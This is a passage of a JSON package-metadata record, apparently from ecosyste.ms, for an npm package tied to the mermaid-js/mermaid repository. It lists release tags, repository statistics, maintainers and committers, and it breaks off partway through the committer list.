-js%2Fmermaid/tags/0.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.5/manifests"},{"name":"0.5.4","sha":"ecb12ae2a8bc7f8c7077737713cf94acffac5c41","kind":"commit","published_at":"2015-10-19T20:08:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.4/manifests"},{"name":"0.5.3","sha":"16906ee242fcaf51d77f082fc3e7167241432ab0","kind":"commit","published_at":"2015-10-04T21:28:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.3/manifests"},{"name":"0.5.2","sha":"a611ff3abd70103fc9ac44af63103e9f9d5991c9","kind":"commit","published_at":"2015-10-04T21:09:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.2/manifests"},{"name":"0.5.1","sha":"0dc983d04ab9400e604a460eea3a409570961ab2","kind":"commit","published_at":"2015-06-21T15:26:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.1/manifests"},{"name":"0.5.0","sha":"999430f9e0c18ca830f497817c8701cfbd2046f9","kind":"commit","published_at":"2015-06-07T15:05:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.0/manifests"},{"name":"0.4.0","sha":"cc1a4be15a5ed3726a121a5fce75a561ddca5e1d","kind":"commit","published_at":"2015-03-01T15:48:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.4.0/manifests"},{"name":"0.3.5","sha":"2512666f493e8455f6534f216d42f00a7c9e526f","kind":"commit","published_at":"2015-02-15T18:34:18.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.5/manifests"},{"name":"0.3.4","sha":"074a819ca8d3d98cdef3144d091a63f919d3a55d","kind":"commit","published_at":"2015-02-15T17:11:46.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.4/manifests"},{"name":"0.3.3","sha":"5452be9feda681abb48d6364fbca662c6af0215d","kind":"commit","published_at":"2015-01-25T15:41:43.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.3/manifests"},{"name":"0.3.2","sha":"911cd09dd875deb50f65a98baf21f65ab2cbf82b","kind":"commit","published_at":"2015-01-11T14:02:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.2/manifests"},{"name":"0.3.1","sha":"222a6e06827f194d9368d3a790dbe6cc53341788","kind":"commit","published_at":"2015-01-05T14:32:39.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.1/manifests"},{"name":"0.3.0","sha":"c50178c640a4f6c99539bcc64cf029e94263fdb4","kind":"commit","published_at":"2014-12-22T12:52:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.0/manifests"},{"name":"0.2.16","sha":"5712c6de7bdca29a2950df1e6e0342ca8f0323a4","kind":"commit","published_at":"2014-12-15T18:35:09.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.16","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.16/manifests"},{"name":"0.2.15","sha":"6988dea3535919faa599537c31c5d94a01a30479","kind":"commit","published_at":"2014-12-05T09:50:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.15","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.15/manifests"},{"name":"0.2.14","sha":"dd26960852b4cba1d60e6bb2e508c0af6dd3d4b4","kind":"commit","published_at":"2014-12-03T18:35:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.14","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.14/manifests"},{"name":"0.2.13","sha":"fe2f3b403d1310c2a6e09aac24d0fdd257c2ddcf","kind":"commit","published_at":"2014-12-03T18:29:44.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.13","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.13/manifests"},{"name":"0.2.10","sha":"15023461722117d1429bbc0eb6030ca35aa51d53","kind":"commit","published_at":"2014-12-01T20:12:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.10","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.10/manifests"},{"name":"0.2.9","sha":"1a7997cdef01882ea7b46948d58625e904a09094","kind":"tag","published_at":"2014-12-01T20:04:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.9","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.9/manifests"},{"name":"0.2.8","sha":"1d2327c4c2ae60692f9bfe8b4d19ea195ebcbb04","kind":"tag","published_at":"2014-12-01T09:01:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.8/manifests"},{"name":"0.2.7","sha":"cbd41dbb1b4875aa3254babca694844908a1ecf7","kind":"tag","published_at":"2014-12-01T08:30:27.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.7/manifests"},{"name":"0.2.6","sha":"9a35844731426e1f74f64d272ae6398f20424457","kind":"commit","published_at":"2014-11-27T20:28:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.6/manifests"},{"name":"0.2.5","sha":"18be0e02aa80dcad171b26d2e397750100dc7d23","kind":"commit","published_at":"2014-11-27T20:16:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.5/manifests"},{"name":"0.2.4","sha":"9c31ac8aa68bff142e33b63b5ca3217aa8db7f5a","kind":"commit","published_at":"2014-11-25T21:58:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.4/manifests"},{"name":"0.2.3","sha":"d18103a0ec61801ac437a46cecaec81628037bb2","kind":"commit","published_at":"2014-11-24T21:03:32.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.3/manifests"},{"name":"0.2.2","sha":"cb58aeab2532be6d8bc1eab6503ca752fcf85965","kind":"commit","published_at":"2014-11-22T18:06:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.2/manifests"},{"name":"0.2.1","sha":"c0a4cfc2d768a7fe0a5d442635b7590054577eeb","kind":"commit","published_at":"2014-11-22T17:36:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.1/manifests"},{"name":"0.2.0","sha":"83de219552e39f8ed19a2300f215e1159abcfb33","kind":"commit","published_at":"2014-11-22T16:29:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.0/manifests"},{"name":"0.1.1","sha":"64bedc8262b6e116c344de10968e78a06323d304","kind":"commit","published_at":"2014-11-17T06:50:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.1/manifests"},{"name":"0.1.0","sha":"46b45a820976091d3dcf1d99c6a4e8a35e7d9ade","kind":"tag","published_at":"2014-11-16T19:32:58.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.0/manifests"}]},"repo_metadata_updated_at":"2025-09-01T14:17:51.348Z","dependent_packages_count":0,"downloads":null,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":37.151553436070586,"dependent_packages_count":55.10184271360268,"stargazers_count":0.0871088878803563,"forks_count":0.49745312733301034,"docker_downloads_count":null,"average":23.209489541221657},"purl":"pkg:npm/mmd-ontology-ttl-monorepo","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/mmd-ontology-ttl-monorepo","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/mmd-ontology-ttl-monorepo","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/mmd-ontology-ttl-monorepo/dependencies","status":"unpublished","funding_links":["https://github.com/sponsors/knsv","https://github.com/sponsors/sidharthv96"],"critical":null,"issue_metadata":{"last_synced_at":"2025-09-01T14:01:58.757Z","issues_count":1461,"pull_requests_count":1558,"avg_time_to_close_issue":27677984.852564104,"avg_time_to_close_pull_request":2277072.9893004117,"issues_closed_count":466,"pull_requests_closed_count":1215,"pull_request_authors_count":359,"issue_authors_count":1156,"avg_comments_per_issue":3.5578370978781657,"avg_comments_per_pull_request":4.093709884467266,"merged_pull_requests_count":970,"bot_issues_count":4,"bot_pull_requests_count":290,"past_year_issues_count":428,"past_year_pull_requests_count":712,"past_year_avg_time_to_close_issue":2790098.3866666667,"past_year_avg_time_to_close_pull_request":1391392.070539419,"past_year_issues_closed_count":75,"past_year_pull_requests_closed_count":482,"past_year_pull_request_authors_count":162,"past_year_issue_authors_count":345,"past_year_avg_comments_per_issue":0.7616822429906542,"past_year_avg_comments_per_pull_request":4.254213483146067,"past_year_bot_issues_count":2,"past_year_bot_pull_requests_count":155,"past_year_merged_pull_requests_count":374,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/issues","maintainers":[{"login":"sidharthv96","count":251,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sidharthv96"},{"login":"huynhicode","count":72,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huynhicode"},{"login":"knsv","count":57,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/knsv"},{"login":"aloisklink","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aloisklink"},{"login":"Yokozuna59","count":27,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Yokozuna59"},{"login":"saurabhg772244","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/saurabhg772244"},{"login":"ashishjain0512","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashishjain0512"},{"login":"yari-dewalt","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/yari-dewalt"},{"login":"Yash-Singh1","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Yash-Singh1"},{"login":"omkarht","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/omkarht"},{"login":"rajat-ht","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rajat-ht"},{"login":"NicolasNewman","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/NicolasNewman"},{"login":"shubhamparikh2704","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubhamparikh2704"},{"login":"IOrlandoni","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/IOrlandoni"},{"login":"GDFaber","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/GDFaber"},{"login":"shubham-mermaid","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubham-mermaid"},{"login":"kedar49","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kedar49"},{"login":"ferozmht","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ferozmht"},{"login":"darshanr0107","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/darshanr0107"},{"login":"Prashant-7718","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Prashant-7718"},{"login":"tylerlong","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/tylerlong"}],"active_maintainers":[{"login":"sidharthv96","count":48,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sidharthv96"},{"login":"knsv","count":31,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/knsv"},{"login":"saurabhg772244","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/saurabhg772244"},{"login":"huynhicode","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huynhicode"},{"login":"ashishjain0512","count":17,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashishjain0512"},{"login":"yari-dewalt","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/yari-dewalt"},{"login":"aloisklink","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aloisklink"},{"login":"omkarht","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/omkarht"},{"login":"rajat-ht","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rajat-ht"},{"login":"shubhamparikh2704","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubhamparikh2704"},{"login":"NicolasNewman","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/NicolasNewman"},{"login":"IOrlandoni","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/IOrlandoni"},{"login":"kedar49","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kedar49"},{"login":"shubham-mermaid","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubham-mermaid"},{"login":"darshanr0107","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/darshanr0107"},{"login":"Prashant-7718","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Prashant-7718"},{"login":"ferozmht","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ferozmht"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/mmd-ontology-ttl-monorepo/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/mmd-ontology-ttl-monorepo/version_numbers","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/mmd-ontology-ttl-monorepo/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/mmd-ontology-ttl-monorepo/related_packages","maintainers":[{"uuid":"sautejfi","login":"sautejfi","name":null,"email":"florian.sautejeau@gmail.com","url":null,"packages_count":4,"html_url":"https://www.npmjs.com/~sautejfi","role":null,"created_at":"2023-07-26T14:07:47.542Z","updated_at":"2023-07-26T14:07:47.542Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/sautejfi/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5131348,"maintainers_count":1051627,"namespaces_count":313328,"keywords_count":730052,"github":"npm","metadata":{"funded_packages_count":155759},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2025-09-05T07:36:50.205Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}}],"commits":{"id":107,"full_name":"mermaid-js/mermaid","default_branch":"develop","committers":[{"name":"Sidharth Vinod","email":"sidharthv96@gmail.com","login":"sidharthv96","count":1647},{"name":"Knut Sveidqvist","email":"knsv@sveido.com","login":"knsv","count":1606},{"name":"dependabot[bot]","email":"49699333+dependabot[bot]","login":"dependabot[bot]","count":453},{"name":"Neil Cuzon","email":"58763315+NeilCuzon","login":"NeilCuzon","count":430},{"name":"Tyler Long","email":"tyler4long@gmail.com","login":"tylerlong","count":321},{"name":"Ashish Jain","email":"ashishjain0512@gmail.com","login":"ashishjain0512","count":302},{"name":"Alois Klink","email":"alois@aloisklink.com","login":"aloisklink","count":215},{"name":"Reda Al Sulais","email":"u.yokozuna@gmail.com","login":"Yokozuna59","count":204},{"name":"renovate[bot]","email":"29139614+renovate[bot]","login":"renovate[bot]","count":188},{"name":"Ashley Engelund (weedySeaDragon @ github)","email":"ashley.engelund@gmail.com","login":"weedySeaDragon","count":166},{"name":"saurabhg772244","email":"saurabh@mermaidchart.com","login":"saurabhg772244","count":158},{"name":"Nikolay Rozhkov","email":"nironame@gmail.com","login":"nirname","count":155},{"name":"Matthieu MOREL","email":"mmorel-35","login":"mmorel-35","count":132},{"name":"Steph","email":"35910788+huynhicode","login":"huynhicode","count":128},{"name":"yari-dewalt","email":"yari.dewalt@gmail.com","login":"yari-dewalt","count":108},{"name":"autofix-ci[bot]","email":"114827586+autofix-ci[bot]","login":"autofix-ci[bot]","count":107},{"name":"NicolasNewman","email":"nanewman01@gmail.com","login":"NicolasNewman","count":106},{"name":"Josh Soref","email":"2119212+jsoref","login":"jsoref","count":105},{"name":"Justin Greywolf","email":"jgreywolf","login":"jgreywolf","count":96},{"name":"Christian Klemm","email":"git@klemm.one","login":"klemmchr","count":94},{"name":"omkarht","email":"omkar@mermaidchart.com","login":"omkarht","count":80},{"name":"Yash Singh","email":"saiansh2525@gmail.com","login":"Yash-Singh1","count":74},{"name":"Ibrahim Wassouf","email":"ib981347@dal.ca","login":"ibrahimWassouf","count":72},{"name":"Marc Faber","email":"faber@genodata.de","login":"GDFaber","count":56},{"name":"Subhash Halder","email":"halder.subhash@gmail.com","login":"subhash-halder","count":53},{"name":"Raghu Rajagopalan","email":"raghu.rajagopalan@gmail.com","login":"raghur","count":47},{"name":"Sean Killeen","email":"SeanKilleen@gmail.com","login":"SeanKilleen","count":43},{"name":"chris moran","email":"chris@chrismoran.com","login":"cmmoran","count":41},{"name":"Shahir Ahmed","email":"ahmeds@dickinson.edu","login":"Shahir-47","count":40},{"name":"erelling","email":"54530323+erelling","login":"erelling","count":38},{"name":"Aakansha Doshi","email":"aakansha1216@gmail.com","login":"ad1992","count":38},{"name":"Matheus B","email":"matheus_ob59@hotmail.com","login":"mathbraga","count":34},{"name":"Austin 